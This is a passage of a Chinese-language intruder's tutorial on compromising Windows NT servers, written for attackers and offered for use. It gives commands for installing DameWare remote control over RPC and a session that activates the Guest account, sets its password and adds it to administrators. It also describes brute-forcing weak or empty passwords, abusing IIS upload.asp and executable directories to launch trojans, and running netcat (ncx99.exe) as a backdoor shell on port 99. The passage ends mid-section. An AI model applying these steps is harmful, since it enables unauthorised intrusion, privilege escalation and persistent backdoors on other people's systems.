中国龙客基地第一期.docVIP

如果你是入侵者 远程主机探测技术FAQ集 - 扫描篇远程主机探测技术FAQ集 - OS识别篇NT完全入侵教程 关于允许匿名登陆的主机的简单入侵 　　 如果你是入侵者 如果你已经夺取了一定的权限，比如，可写的！ 那么运用下面两个软件，可以轻易的帮你入侵： DNTUCli.exe DNTUS26.exe 在命令提示下运行： D:\DNTUCli.exe Usage: DNTUCli.exe \\server DNTUCli.exe \\MachineName (remote server is \\MachineName) DNTUCli.exe \\. (local server) Copyright (C) 1991-2001 DameWare Development  当你输入ip的时候会让你输入用户和密码！ 只要对方开了rpc而且你的用户有可写的权限的话！！ 就会复制同一目录下的DNTUS26.exe，这种程序是自己安装而且自己打开服务的！ 然后你就可以直接连接到对方的c了！ 这种软件有CMD重定向功能··· 　然后你就随便想做你的任何事情了！ C:\net user \\FYNET33 的用户帐户 ---------------------------------- Administrator Guest 命令成功完成。 C:\net user guest /active:yes 命令成功完成。 C:\net user guest wry 命令成功完成。 C:\net user localgroup administrators　guest　/add 命令成功完成。 这个时候你的guest已经是管理员了！！如果你禁止了net.exe或者被删除了你可以用 ftp命令下一个net.exe或者另外一个软件adduser.exe 用法： D:\addusers.exe ADDUSERS {/c|/d{:u}|/e} filename [/t][/s:x] [/?] [\\computername|domainname] [/p :{l|c|e|d}] Error: too few arguments 现在你就是管理员了！要是感觉还不是很爽！呵呵！那么努力进它的内部网络吧！！ 看： 一，进入第一台假设平台的nt服务器 通过简单的扫描器，只需带有简单密码验证的哪些就已足够扫出那些防范教差的机器。 通常的用户名不是空就是相同。 绑定netbeui协议的nt平台有个致命的弱点允许攻击者得到本地用户名列表 及采用暴力法不断验证他们的密码 。 然后，就是因为网管在意识上的不重视，攻击者几乎不需花很大的力气就能找到那些用户名和密码相同的 或密码为空的服务器。 二，攻击者控制服务器文件系统 有了密码对入侵者来说，绝对不是他们的最终目的！ 隐射为本地盘，当入侵者得到你adminitrator组的任何一个成员的密码，或者是个普通用户的密码 这里我把具体命令cut了！ 1，是administrator的成员时几乎可以隐射你任意一个盘。 2，普通用户将利用各种可能的机会得到更多的信息或直接利用web hole来获取更大的权限。 典型的手法有：利用web asp的功能！控制你整个硬盘 （注意iis的一些已知的漏洞 upload.asp)。 注意：利用asp 功能，攻击者同样能控制你硬盘上的大多数的文件（everyone的文件） 三，起动任何他们想要立即运行的程序 一般来说立即启动对nt来说是比较困难的，虽然有些入侵者会写几句命令，然后等待服务器重新 启动时，他的程序也将得以运行，但是我想对于大多数的攻击者来说，他们不会有那么好的耐心 他们会立即启动他们的东西（可能是些后门木马）。 在nt iis的web配置里有个选项是执行--------危险 攻击者将利用他控制你文件系统的任何一种方法把他要启动的程序放到那些允许执行的目录里去 然后他们将 /cgi-bin/xxx.exe 利用web 启动该文件。 指出：iis 默认的一些目录带有可执行的权利 /script/tools/ .... 对于一些初级入侵者来说，他们往往启动的是些后门木马，然后对于那些经验丰富的入侵者 他可能对控制你一台机器已经显得毫无兴趣，他们可能真正的目的是控制你的整个网段。 这里值得注意的是，这些入侵者将会启动一个 等同于telnet shell for nt的东西 netcat ncx99.exe将在nt的99段口开启一个telnet服务端进程，等代攻击者的登陆 四，登陆取得最高权限 登陆后的入侵